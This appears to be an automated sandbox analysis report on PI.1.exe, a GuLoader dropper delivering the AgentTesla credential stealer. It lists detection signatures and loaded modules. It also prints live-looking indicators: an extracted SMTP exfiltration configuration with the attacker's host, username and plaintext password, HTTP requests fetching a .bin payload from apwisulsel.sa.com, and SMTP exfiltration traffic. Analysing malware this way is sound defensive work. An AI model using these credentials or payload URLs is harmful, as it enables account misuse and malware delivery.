Windows Analysis Report
PI.1.exe

Overview

General Information

Sample name: PI.1.exe
Analysis ID: 1410985
MD5: fc8b93107558429854146361da62e618
SHA1: e4a2de78806dbc296ac97505f097e077e798ddf3
SHA256: f27ddc5f225f50a392bfcf9cbd59557d445f5ad47f1ad31f1a899aec1ec92611
Tags: exe
Infos:

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected GuLoader
Installs a global keyboard hook
Obfuscated command line found
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Suspicious Outbound SMTP Connections
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Agent Tesla, AgentTesla A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
 https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Found malware configuration
Source: PI.1.exe.7504.0.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.scootero.cl", "Username": "sending01@scootero.cl", "Password": "Dangote1235$"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Kisang\PI.1.exe ReversingLabs: Detection: 18%
Multi AV Scanner detection for submitted file
Source: PI.1.exe ReversingLabs: Detection: 18%
Uses 32bit PE files
Source: PI.1.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.128.228.214:443 -> 192.168.2.11:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.11:49716 version: TLS 1.2
Source: PI.1.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: ystem.Core.pdb source: powershell.exe, 00000003.00000002.1567339564.0000000007BCF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdbK source: powershell.exe, 00000003.00000002.1570017058.0000000008B15000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1567339564.0000000007B39000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000003.00000002.1561312536.0000000003414000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000003.00000002.1567339564.0000000007B39000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1569685053.0000000008A9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5O source: powershell.exe, 00000003.00000002.1561312536.0000000003414000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdbE source: powershell.exe, 00000003.00000002.1567339564.0000000007B8B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000003.00000002.1567339564.0000000007B39000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1561312536.000000000344D000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_0040635D FindFirstFileW,FindClose, 0_2_0040635D
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_0040580B
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_004027FB FindFirstFileW, 0_2_004027FB
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\dyrekllers\ Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.11:49718 -> 177.221.140.242:587
Source: Traffic Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.11:49718 -> 177.221.140.242:587
Source: Traffic Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.11:49718 -> 177.221.140.242:587
Source: Traffic Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.11:49718 -> 177.221.140.242:587
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.11:49717 -> 177.221.140.242:587
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.128.228.214 104.128.228.214
Source: Joe Sandbox View IP Address: 177.221.140.242 177.221.140.242
Source: Joe Sandbox View IP Address: 177.221.140.242 177.221.140.242
Source: Joe Sandbox View IP Address: 104.26.13.205 104.26.13.205
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GRUPOCGLIMITADACL GRUPOCGLIMITADACL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.11:49717 -> 177.221.140.242:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /xpQuIygmcTEYHTAQJ248.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: apwisulsel.sa.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xpQuIygmcTEYHTAQJ248.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: apwisulsel.sa.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: apwisulsel.sa.com
Source: powershell.exe, 00000003.00000002.1567339564.0000000007BCF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: wab.exe, 0000000D.00000002.2529559166.00000000207CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2529559166.0000000020737000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mail.scootero.cl
Source: PI.1.exe, PI.1.exe.3.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000003.00000002.1565231609.000000000627E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.1562042831.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: PI.1.exe, PI.1.exe.3.dr String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: PI.1.exe, PI.1.exe.3.dr String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000003.00000002.1562042831.0000000005211000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2529559166.00000000206C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: wab.exe, 0000000D.00000002.2529559166.00000000207CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2529559166.0000000020737000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://scootero.cl
Source: PI.1.exe, PI.1.exe.3.dr String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: PI.1.exe, PI.1.exe.3.dr String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: PI.1.exe, PI.1.exe.3.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000003.00000002.1562042831.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.1562042831.0000000005211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB_q
Source: wab.exe, 0000000D.00000002.2529559166.00000000206C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org
Source: wab.exe, 0000000D.00000002.2529559166.00000000206C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/
Source: wab.exe, 0000000D.00000002.2529559166.00000000206C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/t
Source: wab.exe, 0000000D.00000002.2515992871.0000000004AEB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apwisulsel.sa.com/
Source: wab.exe, 0000000D.00000002.2515992871.0000000004AEB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apwisulsel.sa.com/cM
Source: wab.exe, 0000000D.00000002.2516475429.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2515992871.0000000004B12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apwisulsel.sa.com/xpQuIygmcTEYHTAQJ248.bin
Source: wab.exe, 0000000D.00000002.2515992871.0000000004AEB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apwisulsel.sa.com/xpQuIygmcTEYHTAQJ248.bing
Source: powershell.exe, 00000003.00000002.1565231609.000000000627E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1565231609.000000000627E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1565231609.000000000627E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: PI.1.exe, PI.1.exe.3.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: PI.1.exe, PI.1.exe.3.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: PI.1.exe, PI.1.exe.3.dr String found in binary or memory: https://d.symcb.com/rpa0.
Source: powershell.exe, 00000003.00000002.1562042831.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1565231609.000000000627E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown HTTPS traffic detected: 104.128.228.214:443 -> 192.168.2.11:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.11:49716 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe Jump to behavior
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_004052B8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004052B8

System Summary
barindex
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Kisang\PI.1.exe Jump to dropped file
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040326A
Detected potential crypto function
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_004066E2 0_2_004066E2
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_00404AF5 0_2_00404AF5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_0514F3F8 3_2_0514F3F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_0514F0B0 3_2_0514F0B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_205BE399 13_2_205BE399
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_205BAA33 13_2_205BAA33
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_205B4A98 13_2_205B4A98
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_205B3E80 13_2_205B3E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_205B41C8 13_2_205B41C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_22EACC84 13_2_22EACC84
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_22EA1F0B 13_2_22EA1F0B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_2346B200 13_2_2346B200
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_2346C178 13_2_2346C178
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_23463040 13_2_23463040
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_234665D0 13_2_234665D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_23465580 13_2_23465580
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_23462348 13_2_23462348
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_2346E3A0 13_2_2346E3A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_23460006 13_2_23460006
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_23467680 13_2_23467680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_23465CBB 13_2_23465CBB
PE / OLE file has an invalid certificate
Source: PI.1.exe Static PE information: invalid certificate
Tries to load missing DLLs
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Uses 32bit PE files
Source: PI.1.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
